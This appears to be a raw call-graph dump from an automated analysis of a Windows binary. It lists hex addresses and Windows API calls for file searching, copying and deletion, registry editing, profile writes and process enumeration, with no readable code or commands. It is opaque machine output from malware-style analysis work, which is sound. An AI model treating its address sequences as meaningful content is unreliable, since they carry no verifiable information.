99331->99326 99331->99327 99331->99328 99331->99329 99332 8a5c7f 99331->99332 99333 8a61fe 99331->99333 99334 85be6d 8 API calls 99331->99334 99340 8705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99331->99340 99341 85bf07 8 API calls 99331->99341 99342 8a60b9 99331->99342 99343 860a5e ISource 99331->99343 99344 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99331->99344 99346 870433 29 API calls pre_c_initialization 99331->99346 99414 861940 253 API calls 2 library calls 99331->99414 99332->99329 99339 85be6d 8 API calls 99332->99339 99419 8c3ef6 81 API calls __wsopen_s 99333->99419 99334->99331 99335->99329 99339->99329 99340->99331 99341->99331 99417 8c3ef6 81 API calls __wsopen_s 99342->99417 99418 8c3ef6 81 API calls __wsopen_s 99343->99418 99344->99331 99346->99331 99348 862b36 99347->99348 99349 862f70 99347->99349 99350 8a7b7c 99348->99350 99351 862b50 99348->99351 99750 8705d2 5 API calls __Init_thread_wait 99349->99750 99761 8d79f9 253 API calls 99350->99761 99354 8630e0 9 API calls 99351->99354 99353 862f7a 99356 862fbb 99353->99356 99751 85b25f 99353->99751 99357 862b60 99354->99357 99363 8a7b91 99356->99363 99364 862fec 99356->99364 99360 8630e0 9 API calls 99357->99360 99358 8a7b88 99358->99331 99361 862b76 99360->99361 99361->99356 99362 862bac 99361->99362 99362->99363 99388 862bc8 __fread_nolock 99362->99388 99762 8c3ef6 81 API calls __wsopen_s 99363->99762 99758 85b3fe 8 API calls 99364->99758 99367 862ff9 99759 86e662 253 API calls 99367->99759 99368 862f94 99757 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99368->99757 99371 8a7bb9 99763 8c3ef6 81 API calls __wsopen_s 99371->99763 99373 862cef 99374 8a7c1c 99373->99374 99375 862cfc 99373->99375 99765 8d60a2 53 API calls _wcslen 99374->99765 99376 8630e0 9 API calls 99375->99376 99378 862d09 99376->99378 99382 8630e0 9 API calls 99378->99382 99389 862d87 ISource 99378->99389 99379 87016b 8 API calls 99379->99388 99380 87019b 8 API calls 99380->99388 99381 863032 99760 86fe59 8 API calls 99381->99760 99393 862d23 99382->99393 99384 862edd 99384->99331 99385 86306d 99385->99331 99387 8602f0 253 API calls 99387->99388 99388->99367 99388->99371 99388->99373 99388->99379 99388->99380 99388->99387 99388->99389 99390 8a7bfd 99388->99390 99389->99381 99391 8630e0 9 API calls 99389->99391 99395 862e3b ISource 99389->99395 99421 8c276a 99389->99421 99425 8c65b4 99389->99425 99430 8c4ad5 99389->99430 99435 8be9c5 GetFileAttributesW 99389->99435 99437 8c5ed5 99389->99437 99467 8c6d2d 99389->99467 99480 8c874a 99389->99480 99507 8c95f6 99389->99507 99522 8c6561 99389->99522 99529 86be75 99389->99529 99586 8dcd16 99389->99586 99675 8dac49 99389->99675 99680 8deb63 99389->99680 99716 857953 99389->99716 99720 8d9eea 99389->99720 99723 8c8e39 99389->99723 99742 86f95e 99389->99742 99766 8c3ef6 81 API calls __wsopen_s 99389->99766 99764 8c3ef6 81 API calls __wsopen_s 99390->99764 99391->99389 99393->99389 99396 85be6d 8 API calls 99393->99396 99395->99384 99749 86e29c 8 API calls ISource 99395->99749 99396->99389 99414->99331 99415->99316 99416->99329 99417->99343 99418->99329 99419->99329 99420->99329 99422 8c2778 99421->99422 99423 8c2773 99421->99423 99422->99389 99767 8c183b 99423->99767 99792 858e70 99425->99792 99429 8c65d1 99429->99389 99431 858e70 52 API calls 99430->99431 99432 8c4ae8 99431->99432 99824 8bda81 99432->99824 99434 8c4af0 99434->99389 99436 8be9d1 99435->99436 99436->99389 99438 8c5fbd 99437->99438 99439 8c5ef4 99437->99439 99441 858e70 52 API calls 99438->99441 99451 8c6011 99438->99451 99883 85c92d 99439->99883 99443 8c5fef 99441->99443 99442 8c5eff 99444 85c92d 39 API calls 99442->99444 99445 858e70 52 API calls 99443->99445 99446 8c5f15 99444->99446 99447 8c6001 99445->99447 99446->99438 99448 85bf07 8 API calls 99446->99448 99840 8bd836 99447->99840 99450 8c5f26 99448->99450 99452 85bf07 8 API calls 99450->99452 99451->99389 99453 8c5f2f 99452->99453 99454 858e70 52 API calls 99453->99454 99455 8c5f3c 99454->99455 99888 85694e 99455->99888 99457 8c5f4f 99930 857af4 99457->99930 99461 85c92d 39 API calls 99461->99438 99463 85b25f 8 API calls 99464 8c5f80 99463->99464 99465 8bda81 12 API calls 99464->99465 99466 8c5f89 99465->99466 99466->99461 99468 858e70 52 API calls 99467->99468 99469 8c6d47 99468->99469 99470 8c6d84 99469->99470 99471 85c92d 39 API calls 99469->99471 100086 8be783 99470->100086 99473 8c6d76 99471->99473 99473->99470 99476 85557e 9 API calls 99473->99476 99474 8c6d92 100091 857a59 99474->100091 99476->99470 99478 858e70 52 API calls 99478->99474 99479 8c6dd7 99479->99389 99481 8c875a __wsopen_s 99480->99481 99482 858e70 52 API calls 99481->99482 99483 8c877b 99482->99483 99484 85c92d 39 API calls 99483->99484 99491 8c8799 99483->99491 99484->99491 99485 858e70 52 API calls 99486 8c887c 99485->99486 99487 85557e 9 API calls 99486->99487 99488 8c88a7 99487->99488 100097 87d913 99488->100097 99490 8c88cd 99492 8c88f7 GetCurrentDirectoryW SetCurrentDirectoryW 99490->99492 99491->99485 99496 8c8973 99491->99496 99493 8c8921 99492->99493 99492->99496 99494 8be387 4 API calls 99493->99494 99495 8c892a 99494->99495 99495->99496 99497 8be9c5 GetFileAttributesW 99495->99497 99496->99389 99498 8c8938 99497->99498 99499 8c89cb 99498->99499 99500 8c8940 GetFileAttributesW SetFileAttributesW 99498->99500 100100 8c9f9f FindFirstFileW 99499->100100 99501 8c8969 SetCurrentDirectoryW 99500->99501 99502 8c89b1 99500->99502 99501->99496 99504 8c89b5 SetCurrentDirectoryW 99502->99504 99505 8c8a02 SetCurrentDirectoryW 99502->99505 99504->99499 99505->99496 99506 8c89ea 99506->99505 99508 85bf07 8 API calls 99507->99508 99509 8c9607 99508->99509 99510 858e70 52 API calls 99509->99510 99511 8c9616 99510->99511 99512 85557e 9 API calls 99511->99512 99513 8c9621 99512->99513 99514 858e70 52 API calls 99513->99514 99515 8c962e 99514->99515 99516 858e70 52 API calls 99515->99516 99517 8c9640 99516->99517 99518 858e70 52 API calls 99517->99518 99519 8c9655 WritePrivateProfileStringW 99518->99519 99520 8c966b WritePrivateProfileStringW 99519->99520 99521 8c9677 99519->99521 99520->99521 99521->99389 99523 858e70 52 API calls 99522->99523 99524 8c6577 99523->99524 100144 8bdb69 99524->100144 99526 8c657f 99527 8c6583 GetLastError 99526->99527 99528 8c6598 99526->99528 99527->99528 99528->99389 100169 856ab6 99529->100169 99533 87016b 8 API calls 99534 86bea6 99533->99534 99535 87019b 8 API calls 99534->99535 99537 86beb7 99535->99537 99536 8a8f7a 99539 86bf1f 99536->99539 100234 8ca607 39 API calls 99536->100234 99538 857953 CloseHandle 99537->99538 99540 86bec2 99538->99540 99541 85c92d 39 API calls 99539->99541 99545 86bf2c 99539->99545 99542 85bf07 8 API calls 99540->99542 99543 8a8fdc 99541->99543 99544 86beca 99542->99544 99543->99545 99546 8a8fe4 99543->99546 99547 857953 CloseHandle 99544->99547 100206 86fdc9 99545->100206 99549 85c92d 39 API calls 99546->99549 99550 86bed1 99547->99550 99554 86bf33 99549->99554 99551 858e70 52 API calls 99550->99551 99552 86bedd 99551->99552 99553 857953 CloseHandle 99552->99553 99555 86bee7 99553->99555 99556 8a8ff9 99554->99556 99557 86bf4e 99554->99557 100183 856e52 99555->100183 99560 87019b 8 API calls 99556->99560 100211 857a14 99557->100211 99561 8a8ffe 99560->99561 99565 8a9012 99561->99565 100235 8541c9 99561->100235 99576 8a9016 __fread_nolock 99565->99576 100238 8c1759 8 API calls ___scrt_fastfail 99565->100238 99566 86bf00 100191 856b12 99566->100191 99567 8a8f72 100233 857923 CloseHandle ISource 99567->100233 99568 86bf65 99573 857a59 8 API calls 99568->99573 99568->99576 99577 86bf79 99573->99577 99574 86bf0e 100230 856afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 99574->100230 99580 86bfb3 99577->99580 99581 857953 CloseHandle 99577->99581 99578 8a8f3b 100232 8bd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99578->100232 99579 86bf15 99579->99539 99579->99578 99580->99389 99583 86bfa7 99581->99583 99583->99580 100231 857923 CloseHandle ISource 99583->100231 99584 8a8f52 99584->99539 99587 85bf07 8 API calls 99586->99587 99588 8dcd39 99587->99588 99589 85bf07 8 API calls 99588->99589 99590 8dcd42 99589->99590 99591 85bf07 8 API calls 99590->99591 99592 8dcd4b 99591->99592 99593 858e70 52 API calls 99592->99593 99601 8dcdda 99592->99601 99594 8dcd71 99593->99594 100305 8dd6b1 99594->100305 99596 8dcda5 100331 8dd2f7 99596->100331 99598 8dcdd6 99599 8dce76 RegCreateKeyExW 99598->99599 99600 8dce0f RegConnectRegistryW 99598->99600 99598->99601 99603 8dcf0e 99599->99603 99609 8dcead 99599->99609 99600->99599 99600->99601 99601->99389 99604 8dd1d6 RegCloseKey 99603->99604 99606 858e70 52 API calls 99603->99606 99604->99601 99605 8dd1e9 RegCloseKey 99604->99605 99605->99601 99607 8dcf29 99606->99607 100341 874db8 99607->100341 99609->99601 99614 8dceff RegCloseKey 99609->99614 99610 8dcf38 99611 8dcf44 99610->99611 99612 8dcf96 99610->99612 99613 858e70 52 API calls 99611->99613 99615 858e70 52 API calls 99612->99615 99616 8dcf4e _wcslen 99613->99616 99614->99601 99617 8dcfa0 99615->99617 99620 858e70 52 API calls 99616->99620 99618 874db8 _strftime 40 API calls 99617->99618 99619 8dcfaf 99618->99619 99621 8dcfbf 99619->99621 99622 8dd047 99619->99622 99623 8dcf70 99620->99623 99625 858e70 52 API calls 99621->99625 99624 858e70 52 API calls 99622->99624 99627 858e70 52 API calls 99623->99627 99628 8dd051 99624->99628 99626 8dcfc9 _wcslen 99625->99626 99635 858e70 52 API calls 99626->99635 99629 8dcf85 99627->99629 99630 874db8 _strftime 40 API calls 99628->99630 99632 8dd2bb RegSetValueExW 99629->99632 99631 8dd060 99630->99631 99633 8dd156 99631->99633 99632->99604 99642 8dd01f 99632->99642 99637 8dcfeb 99635->99637 99640 858e70 52 API calls 99637->99640 99642->99604 99676 858e70 52 API calls 99675->99676 99677 8dac65 99676->99677 100355 8bdc9c CreateToolhelp32Snapshot Process32FirstW 99677->100355 99679 8dac74 99679->99389 99681 85bf07 8 API calls 99680->99681 99682 8deb7a 99681->99682 99683 858e70 52 API calls 99682->99683 99684 8deb89 99683->99684 99685 857a14 8 API calls 99684->99685 99686 8deb9c 99685->99686 99687 858e70 52 API calls 99686->99687 99688 8deba9 99687->99688 99689 8dec26 99688->99689 99690 8debc1 99688->99690 99691 858e70 52 API calls 99689->99691 99692 85c92d 39 API calls 99690->99692 99693 8dec2b 99691->99693 99694 8debc6 99692->99694 99695 8dec38 99693->99695 99696 8dec73 99693->99696 99694->99695 99699 8debdf 99694->99699 99698 856ab6 8 API calls 99695->99698 99697 8dec8b 99696->99697 99701 85c92d 39 API calls 99696->99701 99702 8deca4 99697->99702 99704 85c92d 39 API calls 99697->99704 99713 8dec45 99698->99713 99700 858685 8 API calls 99699->99700 99703 8debec 99700->99703 99701->99697 99705 85be6d 8 API calls 99702->99705 99706 857af4 8 API calls 99703->99706 99704->99702 99707 8decbe 99705->99707 99708 8debfa 99706->99708 100373 8b9b57 99707->100373 99710 858685 8 API calls 99708->99710 99712 8dec13 99710->99712 99711 8dec21 99715 857a59 8 API calls 99711->99715 99714 857af4 8 API calls 99712->99714 99713->99389 99714->99711 99715->99713 99717 85795d 99716->99717 99718 85796c 99716->99718 99717->99389 99718->99717 99719 857971 CloseHandle 99718->99719 99719->99717 100399 8d88b6 99720->100399 99722 8d9efa 99722->99389 99724 85bf07 8 API calls 99723->99724 99725 8c8e4a 99724->99725 99726 87019b 8 API calls 99725->99726 99727 8c8e54 99726->99727 99728 8541a6 8 API calls 99727->99728 99729 8c8e5e 99728->99729 99730 858e70 52 API calls 99729->99730 99731 8c8e6d 99730->99731 99732 85557e 9 API calls 99731->99732 99733 8c8e78 99732->99733 99734 858e70 52 API calls 99733->99734 99735 8c8e85 99734->99735 99736 858e70 52 API calls 99735->99736 99737 8c8e97 99736->99737 99738 858e70 52 API calls 99737->99738 99739 8c8eac GetPrivateProfileStringW 99738->99739 99740 856ab6 8 API calls 99739->99740 99741 8c8ecf ISource 99740->99741 99741->99389 99743 85c92d 39 API calls 99742->99743 99744 86f972 99743->99744 99745 8afac0 Sleep 99744->99745 99746 86f97a timeGetTime 99744->99746 99747 85c92d 39 API calls 99746->99747 99748 86f990 99747->99748 99748->99389 99749->99395 99750->99353 99752 85b26e _wcslen 99751->99752 99753 87019b 8 API calls 99752->99753 99754 85b296 __fread_nolock 99753->99754 99755 87016b 8 API calls 99754->99755 99756 85b2ac 99755->99756 99756->99368 99757->99356 99758->99367 99759->99381 99760->99385 99761->99358 99762->99389 99763->99389 99764->99389 99765->99393 99766->99389 99768 8c1852 99767->99768 99783 8c196b 99767->99783 99769 8c1872 99768->99769 99770 8c189f 99768->99770 99772 8c18b6 99768->99772 99769->99770 99774 8c1886 99769->99774 99771 87019b 8 API calls 99770->99771 99776 8c1894 __fread_nolock 99771->99776 99773 87019b 8 API calls 99772->99773 99784 8c18d3 99772->99784 99773->99784 99777 87019b 8 API calls 99774->99777 99775 8c18fa 99778 87019b 8 API calls 99775->99778 99779 87016b 8 API calls 99776->99779 99777->99776 99780 8c1900 99778->99780 99779->99783 99786 86c1f1 99780->99786 99783->99422 99784->99774 99784->99775 99784->99776 99787 87019b 8 API calls 99786->99787 99788 86c208 99787->99788 99789 87016b 8 API calls 99788->99789 99790 86c214 99789->99790 99791 86f9e2 10 API calls 99790->99791 99791->99776 99793 858e85 99792->99793 99794 858e82 99792->99794 99795 858e8d 99793->99795 99796 858ebb 99793->99796 99815 8be387 lstrlenW 99794->99815 99820 875556 26 API calls 99795->99820 99798 896b10 99796->99798 99801 858ecd 99796->99801 99806 896a29 99796->99806 99823 875513 26 API calls 99798->99823 99799 858e9d 99805 87016b 8 API calls 99799->99805 99821 86fe8f 51 API calls 99801->99821 99802 896b28 99802->99802 99807 858ea7 99805->99807 99808 896aa2 99806->99808 99810 87019b 8 API calls 99806->99810 99809 85b25f 8 API calls 99807->99809 99822 86fe8f 51 API calls 99808->99822 99809->99794 99811 896a72 99810->99811 99812 87016b 8 API calls 99811->99812 99813 896a99 99812->99813 99814 85b25f 8 API calls 99813->99814 99814->99808 99816 8be3a5 GetFileAttributesW 99815->99816 99817 8be3cf 99815->99817 99816->99817 99818 8be3b1 FindFirstFileW 99816->99818 99817->99429 99818->99817 99819 8be3c2 FindClose 99818->99819 99819->99817 99820->99799 99821->99799 99822->99798 99823->99802 99836 8579ed 99824->99836 99827 8bdaca GetLastError 99828 8bdad7 CreateDirectoryW 99827->99828 99829 8bdae5 99827->99829 99828->99829 99830 8bdae3 99828->99830 99829->99830 99831 8596d9 8 API calls 99829->99831 99830->99434 99832 8bdb27 99831->99832 99833 8bda81 8 API calls 99832->99833 99834 8bdb30 99833->99834 99834->99830 99835 8bdb34 CreateDirectoryW 99834->99835 99835->99830 99837 8579fb 99836->99837 99838 8596d9 8 API calls 99837->99838 99839 857a0f GetFileAttributesW 99838->99839 99839->99827 99839->99830 99841 85bf07 8 API calls 99840->99841 99842 8bd853 99841->99842 99843 85bf07 8 API calls 99842->99843 99844 8bd85b 99843->99844 99845 85bf07 8 API calls 99844->99845 99846 8bd863 99845->99846 99942 85557e 99846->99942 99849 85557e 9 API calls 99850 8bd877 99849->99850 99952 8be958 99850->99952 99852 8bd882 99853 8be9c5 GetFileAttributesW 99852->99853 99854 8bd88d 99853->99854 99855 8bd89f 99854->99855 99856 8565a4 8 API calls 99854->99856 99857 8be9c5 GetFileAttributesW 99855->99857 99856->99855 99858 8bd8a7 99857->99858 99859 8bd8b4 99858->99859 99861 8565a4 8 API calls 99858->99861 99860 85bf07 8 API calls 99859->99860 99862 8bd8bc 99860->99862 99861->99859 99863 85bf07 8 API calls 99862->99863 99864 8bd8c4 99863->99864 99865 85694e 8 API calls 99864->99865 99866 8bd8d5 FindFirstFileW 99865->99866 99867 8bda23 FindClose 99866->99867 99878 8bd8f8 99866->99878 99871 8bda21 99867->99871 99868 8bd9ef FindNextFileW 99868->99878 99869 85b25f 8 API calls 99869->99878 99871->99451 99872 857af4 8 API calls 99872->99878 99874 8bdc8e 4 API calls 99874->99878 99875 8bda12 FindClose 99875->99871 99876 8bd984 99880 8bd9ad MoveFileW 99876->99880 99881 8bd99d DeleteFileW 99876->99881 100026 86e2e5 99876->100026 99878->99867 99878->99868 99878->99869 99878->99872 99878->99874 99878->99875 99878->99876 99879 8bda5c CopyFileExW 99878->99879 99882 8bd9ca DeleteFileW 99878->99882 99963 8bdf85 99878->99963 100017 8565a4 99878->100017 99879->99878 99880->99878 99881->99878 99882->99878 99884 85c93e 99883->99884 99885 85c945 99883->99885 99884->99885 100060 876661 39 API calls _strftime 99884->100060 99885->99442 99887 85c988 99887->99442 99889 85bf07 8 API calls 99888->99889 99890 856964 99889->99890 99891 85bf07 8 API calls 99890->99891 99892 85696c 99891->99892 99893 85bf07 8 API calls 99892->99893 99894 856974 99893->99894 99895 85bf07 8 API calls 99894->99895 99896 85697c 99895->99896 99897 8569b0 99896->99897 99898 895725 99896->99898 99900 858685 8 API calls 99897->99900 99899 85be6d 8 API calls 99898->99899 99901 89572e 99899->99901 99902 8569be 99900->99902 99903 85bceb 8 API calls 99901->99903 99904 8596d9 8 API calls 99902->99904 99908 8569f3 99903->99908 99905 8569c8 99904->99905 99906 858685 8 API calls 99905->99906 99905->99908 99910 8569e9 99906->99910 99907 856a38 100061 858685 99907->100061 99908->99907 99911 856a14 99908->99911 99916 895750 99908->99916 99913 8596d9 8 API calls 99910->99913 99911->99907 99915 85627c 8 API calls 99911->99915 99912 856a49 99914 856a5f 99912->99914 99920 85be6d 8 API calls 99912->99920 99913->99908 99917 856a73 99914->99917 99922 85be6d 8 API calls 99914->99922 99918 856a21 99915->99918 99919 8584b7 8 API calls 99916->99919 99921 856a7e 99917->99921 99924 85be6d 8 API calls 99917->99924 99918->99907 99923 858685 8 API calls 99918->99923 99926 895810 99919->99926 99920->99914 99925 85be6d 8 API calls 99921->99925 99928 856a89 99921->99928 99922->99917 99923->99907 99924->99921 99925->99928 99926->99907 99927 85627c 8 API calls 99926->99927 100074 85acc0 8 API calls __fread_nolock 99926->100074 99927->99926 99928->99457 99931 857b06 99930->99931 99932 8963b3 99930->99932 100075 857b17 99931->100075 100085 85662b 8 API calls __fread_nolock 99932->100085 99935 857b12 99935->99466 99939 8bdc8e 99935->99939 99936 8963bd 99937 85be6d 8 API calls 99936->99937 99938 8963c9 99936->99938 99937->99938 99940 8be387 4 API calls 99939->99940 99941 8bdc95 99940->99941 99941->99463 99941->99466 100032 8922f0 99942->100032 99945 8555c5 100034 85bceb 99945->100034 99946 8555aa 99947 8584b7 8 API calls 99946->99947 99949 8555b6 99947->99949 99950 8579ed 8 API calls 99949->99950 99951 8555c2 99950->99951 99951->99849 99953 85bf07 8 API calls 99952->99953 99954 8be96d 99953->99954 99955 85bf07 8 API calls 99954->99955 99956 8be975 99955->99956 99957 85694e 8 API calls 99956->99957 99958 8be984 99957->99958 99959 85694e 8 API calls 99958->99959 99960 8be994 99959->99960 99961 86e2e5 41 API calls 99960->99961 99962 8be9a9 99961->99962 99962->99852 99964 8bdfa1 99963->99964 99965 8bdfbc 99964->99965 99966 8bdfa6 99964->99966 99967 85bf07 8 API calls 99965->99967 99968 85be6d 8 API calls 99966->99968 100016 8bdfb7 99966->100016 99969 8bdfc4 99967->99969 99968->100016 99970 85bf07 8 API calls 99969->99970 99971 8bdfcc 99970->99971 100016->99878 100018 895629 100017->100018 100019 8565bb 100017->100019 100020 87016b 8 API calls 100018->100020 100045 8565cc 100019->100045 100023 895633 _wcslen 100020->100023 100024 87019b 8 API calls 100023->100024 100025 89566c __fread_nolock 100024->100025 100027 86e2f4 CompareStringW 100026->100027 100028 8ae463 100026->100028 100030 86e319 100027->100030 100028->100030 100031 87e24b 40 API calls 100028->100031 100030->99876 100031->100028 100033 85558b GetFullPathNameW 100032->100033 100033->99945 100033->99946 100035 85bd05 100034->100035 100036 85bcf8 100034->100036 100037 87016b 8 API calls 100035->100037 100036->99949 100038 85bd0f 100037->100038 100039 87019b 8 API calls 100038->100039 100039->100036 100046 8565dc _wcslen 100045->100046 100047 89568b 100046->100047 100048 8565ef 100046->100048 100050 87016b 8 API calls 100047->100050 100055 857cb3 100048->100055 100052 895695 100050->100052 100056 857cc9 100055->100056 100059 857cc4 __fread_nolock 100055->100059 100060->99887 100062 858694 100061->100062 100063 8586f1 100061->100063 100062->100063 100064 85869f 100062->100064 100065 8596d9 8 API calls 100063->100065 100066 8966b7 100064->100066 100067 8586ba 100064->100067 100071 8586c2 __fread_nolock 100065->100071 100069 87016b 8 API calls 100066->100069 100068 858894 8 API calls 100067->100068 100068->100071 100070 8966c1 100069->100070 100072 87019b 8 API calls 100070->100072 100071->99912 100073 8966f4 100072->100073 100074->99926 100076 857b5a __fread_nolock 100075->100076 100077 857b26 100075->100077 100076->99935 100077->100076 100078 8963e4 100077->100078 100079 857b4d 100077->100079 100080 87016b 8 API calls 100078->100080 100081 857cb3 8 API calls 100079->100081 100082 8963f3 100080->100082 100081->100076 100083 87019b 8 API calls 100082->100083 100084 896427 __fread_nolock 100083->100084 100085->99936 100087 8922f0 __wsopen_s 100086->100087 100088 8be790 GetShortPathNameW 100087->100088 100089 8584b7 8 API calls 100088->100089 100090 8be7b8 100089->100090 100090->99474 100090->99478 100092 857a9e 100091->100092 100093 857a65 100091->100093 100094 85be6d 8 API calls 100092->100094 100096 857a78 100092->100096 100095 87016b 8 API calls 100093->100095 100094->100096 100095->100096 100096->99479 100114 87d6be 100097->100114 100101 8ca03a FindClose 100100->100101 100105 8c9fc9 100100->100105 100102 8ca04b FindFirstFileW 100101->100102 100103 8ca0e2 100101->100103 100110 8ca060 100102->100110 100112 8ca0d9 FindClose 100102->100112 100103->99506 100104 8ca028 FindNextFileW 100104->100101 100104->100105 100105->100104 100108 8c9ff7 GetFileAttributesW SetFileAttributesW 100105->100108 100107 8ca0c7 FindNextFileW 100107->100110 100107->100112 100108->100105 100109 8ca0eb FindClose 100108->100109 100109->100103 100110->100107 100111 8ca0a0 SetCurrentDirectoryW 100110->100111 100110->100112 100113 8ca0c0 SetCurrentDirectoryW 100110->100113 100111->100110 100112->100103 100113->100107 100115 87d6d5 100114->100115 100116 87d89f 100114->100116 100115->100116 100121 87d740 100115->100121 100142 87f669 20 API calls _abort 100116->100142 100118 87d8af 100143 882b7c 26 API calls ___std_exception_copy 100118->100143 100120 87d774 100120->99490 100123 87d764 100121->100123 100130 87d78b 100121->100130 100137 885153 26 API calls 2 library calls 100121->100137 100122 87d7fd 100125 87d868 100122->100125 100126 87d820 100122->100126 100136 87f669 20 API calls _abort 100123->100136 100125->100120 100125->100123 100128 87d87b 100125->100128 100126->100123 100129 87d841 100126->100129 100139 885153 26 API calls 2 library calls 100126->100139 100141 885153 26 API calls 2 library calls 100128->100141 100129->100120 100129->100123 100133 87d857 100129->100133 100130->100122 100130->100123 100138 885153 26 API calls 2 library calls 100130->100138 100140 885153 26 API calls 2 library calls 100133->100140 100136->100120 100137->100130 100138->100122 100139->100129 100140->100120 100141->100120 100142->100118 100143->100120 100145 85bf07 8 API calls 100144->100145 100146 8bdb88 100145->100146 100147 85bf07 8 API calls 100146->100147 100148 8bdb91 100147->100148 100149 85bf07 8 API calls 100148->100149 100150 8bdb9a 100149->100150 100151 85557e 9 API calls 100150->100151 100152 8bdba5 100151->100152 100153 8be9c5 GetFileAttributesW 100152->100153 100154 8bdbae 100153->100154 100155 8bdbc0 100154->100155 100156 8565a4 8 API calls 100154->100156 100157 85694e 8 API calls 100155->100157 100156->100155 100158 8bdbd4 FindFirstFileW 100157->100158 100159 8bdc60 FindClose 100158->100159 100163 8bdbf3 100158->100163 100166 8bdc6b 100159->100166 100160 8bdc3b FindNextFileW 100161 8bdc4f 100160->100161 100160->100163 100161->100163 100162 85be6d 8 API calls 100162->100163 100163->100159 100163->100160 100163->100162 100164 857af4 8 API calls 100163->100164 100165 8565a4 8 API calls 100163->100165 100164->100163 100167 8bdc2c DeleteFileW 100165->100167 100166->99526 100167->100160 100168 8bdc57 FindClose 100167->100168 100168->100166 100170 89587b 100169->100170 100173 856ac6 100169->100173 100171 8584b7 8 API calls 100170->100171 100174 89588c 100170->100174 100171->100174 100172 85bceb 8 API calls 100175 895896 100172->100175 100176 87016b 8 API calls 100173->100176 100174->100172 100175->100175 100177 856ad9 100176->100177 100178 856af4 100177->100178 100179 856ae2 100177->100179 100181 85bf07 8 API calls 100178->100181 100180 85b25f 8 API calls 100179->100180 100182 856aea 100180->100182 100181->100182 100182->99533 100182->99536 100184 895985 100183->100184 100185 856e69 CreateFileW 100183->100185 100186 89598b CreateFileW 100184->100186 100187 856e88 100184->100187 100185->100187 100186->100187 100188 8959b3 100186->100188 100187->99566 100187->99567 100239 856bfa 100188->100239 100192 856b27 100191->100192 100205 856b24 ISource 100191->100205 100193 856bfa 3 API calls 100192->100193 100192->100205 100194 856b44 100193->100194 100195 89589b 100194->100195 100196 856b51 100194->100196 100198 86fdc9 3 API calls 100195->100198 100197 87019b 8 API calls 100196->100197 100199 856b5d 100197->100199 100198->100205 100245 8541a6 100199->100245 100204 856bfa 3 API calls 100204->100205 100205->99574 100207 856bfa 3 API calls 100206->100207 100208 86fde7 100207->100208 100209 856bfa 3 API calls 100208->100209 100210 86fe08 100209->100210 100210->99554 100212 87019b 8 API calls 100211->100212 100213 857a39 100212->100213 100214 87016b 8 API calls 100213->100214 100215 857a47 100214->100215 100216 86bfbc 100215->100216 100217 86bfc7 100216->100217 100218 86c003 100216->100218 100217->100218 100220 86bfd6 100217->100220 100219 85bceb 8 API calls 100218->100219 100229 8bd2ab 100219->100229 100221 86bfeb 100220->100221 100222 86bff8 100220->100222 100255 86c009 100221->100255 100262 8bd3b2 12 API calls 100222->100262 100225 86bff4 100225->99568 100227 8bd2da 100227->99568 100229->100227 100263 8bd249 100229->100263 100270 85acc0 8 API calls __fread_nolock 100229->100270 100230->99579 100231->99580 100232->99584 100233->99536 100234->99536 100236 85b050 2 API calls 100235->100236 100237 8541da 100236->100237 100237->99565 100238->99576 100244 856c11 100239->100244 100240 8958ec SetFilePointerEx 100241 856c98 SetFilePointerEx SetFilePointerEx 100243 856c64 100241->100243 100242 8958db 100242->100240 100243->100187 100244->100240 100244->100241 100244->100242 100244->100243 100246 87016b 8 API calls 100245->100246 100247 8541b8 100246->100247 100248 85b050 100247->100248 100249 85b0cb 100248->100249 100252 85b05e 100248->100252 100254 86f13c SetFilePointerEx 100249->100254 100250 856b73 100250->100204 100252->100250 100253 85b09c ReadFile 100252->100253 100253->100250 100253->100252 100254->100252 100256 86c1f1 8 API calls 100255->100256 100257 86c021 100256->100257 100271 85adc1 100257->100271 100261 86c03c 100261->100225 100262->100225 100264 8bd26a 100263->100264 100265 8bd253 100263->100265 100267 85b050 2 API calls 100264->100267 100265->100264 100266 8bd259 100265->100266 100268 85b050 2 API calls 100266->100268 100269 8bd263 100267->100269 100268->100269 100269->100229 100270->100229 100285 86feaa 100271->100285 100273 85ae07 100273->100261 100277 858774 MultiByteToWideChar 100273->100277 100274 85b050 2 API calls 100275 85add2 100274->100275 100275->100273 100275->100274 100292 85b0e3 8 API calls __fread_nolock 100275->100292 100278 8587e7 100277->100278 100279 8587a0 100277->100279 100281 85bceb 8 API calls 100278->100281 100280 87019b 8 API calls 100279->100280 100282 8587b5 MultiByteToWideChar 100280->100282 100283 8587db 100281->100283 100293 8587f0 100282->100293 100283->100261 100286 8afe13 100285->100286 100287 86febb 100285->100287 100288 87016b 8 API calls 100286->100288 100287->100275 100289 8afe1d 100288->100289 100290 87019b 8 API calls 100289->100290 100291 8afe32 100290->100291 100292->100275 100294 858884 100293->100294 100296 858803 100293->100296 100295 8596d9 8 API calls 100294->100295 100302 858821 __fread_nolock 100295->100302 100296->100294 100297 85880f 100296->100297 100298 858847 100297->100298 100299 858819 100297->100299 100301 87016b 8 API calls 100298->100301 100300 858894 8 API calls 100299->100300 100300->100302 100303 858851 100301->100303 100302->100283 100304 87019b 8 API calls 100303->100304 100304->100302 100306 85bceb 8 API calls 100305->100306 100307 8dd6bf 100306->100307 100308 85bceb 8 API calls 100307->100308 100309 8dd6c7 100308->100309 100310 85bceb 8 API calls 100309->100310 100311 8dd6cf 100310->100311 100312 8dd737 100311->100312 100313 85627c 8 API calls 100311->100313 100314 85bceb 8 API calls 100312->100314 100315 8dd6e5 100313->100315 100317 8dd735 100314->100317 100315->100312 100316 85627c 8 API calls 100315->100316 100318 8dd6f7 100316->100318 100320 858685 8 API calls 100317->100320 100318->100312 100319 8dd6fc 100318->100319 100321 8596d9 8 API calls 100319->100321 100322 8dd760 100320->100322 100326 8dd707 100321->100326 100323 858685 8 API calls 100322->100323 100324 8dd777 100323->100324 100325 8579ed 8 API calls 100324->100325 100327 8dd780 100325->100327 100328 858685 8 API calls 100326->100328 100327->99596 100329 8dd728 100328->100329 100330 8596d9 8 API calls 100329->100330 100330->100317 100332 85c269 8 API calls 100331->100332 100333 8dd30e CharUpperBuffW 100332->100333 100334 8dd329 100333->100334 100335 85bf07 8 API calls 100334->100335 100336 8dd334 100335->100336 100337 858685 8 API calls 100336->100337 100338 8dd347 _wcslen 100337->100338 100339 8579ed 8 API calls 100338->100339 